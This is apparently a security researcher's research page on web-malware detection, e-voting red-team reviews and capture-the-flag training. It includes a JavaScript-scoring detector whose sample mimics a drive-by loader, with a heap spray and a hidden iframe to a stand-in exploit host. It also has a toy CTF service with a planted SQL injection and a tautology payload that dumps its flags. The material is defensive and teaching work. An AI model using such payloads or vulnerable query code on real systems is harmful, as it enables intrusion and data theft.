Research
Play hard, work hard
My research interests include most aspects of computer security, with an emphasis on malware, web security, and vulnerability analysis. In the past, I've also worked on electronic voting security and intrusion detection.
My publications are available on Google Scholar.
Web-based Malware Detection

Attacks against web clients (i.e., browsers and their plugins) have become prevalent. Two particularly insidious kinds of attack are drive-by downloads, in which a web page launches exploits against a vulnerable browser to infect the visiting machine with malware (which often, in turn, turns the machine into a bot), and Flash-based malvertisements, malicious advertisements designed to exploit vulnerabilities in Flash players or to redirect an unsuspecting visitor to a questionable web site.

I led the design and development of Jsand, a tool that detects web pages and PDF files that launch drive-by-download attacks, and was involved in the design and development of OdoSwiff, a tool that detects malicious advertisements written in Flash. Both tools are publicly available through Wepawet, our online service for the analysis of web-based malware.
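As an added illustration of the detection problem these tools address (this is example code written for this page, not code from Jsand, OdoSwiff or Wepawet), the following Python scorer counts symptoms that obfuscated drive-by loaders tend to show in a page's JavaScript: decode-and-execute calls, runs of %u-encoded bytes used for shellcode and heap sprays, zero-size iframes that pull in an exploit page, and oversized string literals. The feature set, the weights, the threshold and the two sample scripts are assumptions constructed for the example and do not describe how Jsand or OdoSwiff reach their verdicts.

```python
"""Static heuristics for flagging drive-by-download style JavaScript.

Added example, not code from Jsand, OdoSwiff or Wepawet. The features,
weights, threshold and samples below are assumptions chosen for this demo.
"""
import re
from typing import Dict

# Symptoms to count. All patterns are case sensitive except the iframe one.
DANGEROUS_CALLS = re.compile(
    r"\b(?:eval|unescape|setTimeout|Function)\s*\("   # execute / decode
    r"|\.fromCharCode\s*\("                           # build code from char codes
    r"|document\.write\s*\("                          # inject markup at runtime
)
UNICODE_ESCAPE_RUN = re.compile(r"(?:%u[0-9a-fA-F]{4}){8,}")   # %u0c0c%u0c0c... blocks
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*(?:width|height)\s*=\s*[\"']?0\b", re.IGNORECASE)
STRING_LITERAL = re.compile(r"\"[^\"\n]*\"|'[^'\n]*'")

# Weights, per-feature caps and cut-off: assumptions for this demo.
WEIGHTS = {"dangerous_calls": 2, "unicode_escape_runs": 4, "hidden_iframes": 3, "long_literal": 2}
CAPS = {"dangerous_calls": 3, "unicode_escape_runs": 2, "hidden_iframes": 2, "long_literal": 1}
LONG_LITERAL = 200
THRESHOLD = 6


def extract_features(js: str) -> Dict[str, int]:
    """Count each symptom in the script text."""
    literals = STRING_LITERAL.findall(js)
    longest = max((len(lit) for lit in literals), default=0)
    return {
        "dangerous_calls": len(DANGEROUS_CALLS.findall(js)),
        "unicode_escape_runs": len(UNICODE_ESCAPE_RUN.findall(js)),
        "hidden_iframes": len(HIDDEN_IFRAME.findall(js)),
        "long_literal": 1 if longest > LONG_LITERAL else 0,
    }


def score(js: str) -> int:
    """Weighted sum of capped feature counts; a benign page should stay near 0."""
    feats = extract_features(js)
    return sum(WEIGHTS[name] * min(count, CAPS[name]) for name, count in feats.items())


def is_suspicious(js: str) -> bool:
    return score(js) >= THRESHOLD


# Constructed samples (not captured from real pages).
BENIGN_SAMPLE = """
function ready(fn) {
  if (document.readyState !== "loading") { fn(); }
  else { document.addEventListener("DOMContentLoaded", fn); }
}
ready(function () {
  document.getElementById("banner").textContent = "Welcome back";
});
"""

# Shape of a typical drive-by loader: heap spray built from %u-encoded blocks,
# a zero-size iframe to the exploit page, and code assembled at runtime.
# The byte values are placeholders, not a working payload.
MALICIOUS_SAMPLE = """
var s = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");
var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
while (s.length < 0x10000) { s += s; }
var spray = [];
for (var i = 0; i < 200; i++) { spray[i] = nop + s; }
document.write('<iframe src="http://example.invalid/exp.php" width=0 height=0></iframe>');
eval(String.fromCharCode(118, 97, 114, 32, 120, 61, 49, 59));
"""

if __name__ == "__main__":
    for name, js in (("benign", BENIGN_SAMPLE), ("malicious", MALICIOUS_SAMPLE)):
        print(name, score(js), extract_features(js))
```

Static counts like these are cheap to compute but easy to evade with one more layer of custom packing, which is why analyzers that have to hold up against real drive-by pages execute the script in an instrumented or emulated browser and judge what it does at runtime rather than how its source looks.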
E-Voting Security

California Top-To-Bottom Review

I was a member of the UCSB Security Group that analyzed the Sequoia electronic voting system as part of the Top-to-Bottom Review of the electronic voting systems used in California. The study was commissioned by California Secretary of State Debra Bowen. As a result of the review, the Secretary of State decertified the systems then in use and recertified them subject to stricter procedures and security measures.

We acted as a "Red Team" and performed a series of security tests of both the hardware and the software that make up the Sequoia system, to identify security problems that could lead to a compromise.

We exposed a number of serious security issues: we were able to bypass both the physical and the software security protections of the Sequoia system, and we demonstrated how these vulnerabilities could be exploited by a determined attacker to modify (or invalidate) the results of an election.
Ohio EVEREST Project

I was a member of the WebWise Security team that analyzed the ES&S electronic voting system as part of the EVEREST project. The study was commissioned by Ohio Secretary of State Jennifer Brunner, who issued a series of recommendations and options to address the study's findings.

Our testing consisted of a "red teaming" assessment of the security of the hardware and software that make up the ES&S system. We identified a number of serious vulnerabilities and, by developing a number of attacks, showed how they could be exploited to compromise the integrity of an election. We also demonstrated how a virus could be created to infect and control electronic voting machines.
Security training

For several years, I have been one of the people involved in organizing the UCSB International Capture The Flag competition (iCTF). The iCTF is a distributed, wide-area security exercise whose goal is to test the participants' security skills from both the attack and the defense viewpoints.

During the iCTF, a number of teams compete independently against each other. We provide each team with an identical copy of a virtualized network installation (for example, a Linux host). The host includes a number of programs and network services that we developed and in which we intentionally introduced vulnerabilities. The task of each team is then to find the vulnerabilities, fix them without disrupting the normal operation of the programs, and leverage their knowledge of the vulnerabilities to compromise the servers run by the other teams.
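To make the find-fix-exploit loop concrete, here is an added example (written for this page, not a service from any iCTF image): a toy team service in Python with one deliberately planted flaw, an SQL injection in the flag lookup, next to its patched version, a scorebot-style functionality check, and the exploit a rival team would run. The service, the flaw, the flag format and the check are all assumptions made for the example.

```python
"""Toy attack/defense CTF service: vulnerable and patched versions, plus a
scorebot-style functionality check and an exploit.

Added example, not code from the iCTF. The service, its planted flaw
(SQL injection in the flag lookup) and the flag format are assumptions.
"""
import secrets
import sqlite3
from typing import List


class FlagService:
    """Team-owned service: stores one flag per account, returns it on login."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE accounts (user TEXT PRIMARY KEY, password TEXT, flag TEXT)")

    def register(self, user: str, password: str, flag: str) -> None:
        self.db.execute("INSERT INTO accounts VALUES (?, ?, ?)", (user, password, flag))

    def get_flag(self, user: str, password: str) -> List[str]:
        raise NotImplementedError


class VulnerableFlagService(FlagService):
    """Version shipped in the team image: the query is built by string formatting."""

    def get_flag(self, user: str, password: str) -> List[str]:
        q = "SELECT flag FROM accounts WHERE user = '%s' AND password = '%s'" % (user, password)
        return [row[0] for row in self.db.execute(q)]


class PatchedFlagService(FlagService):
    """Fixed version: identical interface and behaviour, parameterised query."""

    def get_flag(self, user: str, password: str) -> List[str]:
        q = "SELECT flag FROM accounts WHERE user = ? AND password = ?"
        return [row[0] for row in self.db.execute(q, (user, password))]


def scorebot_check(svc: FlagService) -> bool:
    """What the organisers' scorebot does each round: plant a flag, read it
    back with the right password, and confirm a wrong password returns nothing.
    A patch that breaks this earns no points even if it closes the hole."""
    flag = "FLG" + secrets.token_hex(8)
    user = "sb_" + secrets.token_hex(4)
    svc.register(user, "s3cret", flag)
    readable = svc.get_flag(user, "s3cret") == [flag]
    protected = svc.get_flag(user, "wrong") == []
    return readable and protected


def exploit(svc: FlagService) -> List[str]:
    """Attacker's move against another team's instance: an injected password
    that turns the WHERE clause into a tautology and dumps every stored flag."""
    return svc.get_flag("anyone", "' OR '1'='1")


def demo(service_cls) -> dict:
    """Plant two flags, attack, then run the scorebot check on the same instance."""
    svc = service_cls()
    svc.register("alice", "hunter2", "FLG" + "a" * 16)
    svc.register("bob", "letmein", "FLG" + "b" * 16)
    leaked = sorted(exploit(svc))   # attack first, so only the two planted flags can leak
    return {"scorebot_ok": scorebot_check(svc), "flags_leaked": leaked}


if __name__ == "__main__":
    for cls in (VulnerableFlagService, PatchedFlagService):
        print(cls.__name__, demo(cls))
```

The two checks encode the constraint stated above: the vulnerable service passes the scorebot and leaks every flag, the patched one passes the scorebot and leaks none. A "fix" that changed observable behaviour instead, for example rejecting any password containing a quote or raising an error instead of returning an empty result, would fail the scorebot and cost the team points, which is why the patch keeps the exact interface and changes only how the query is built.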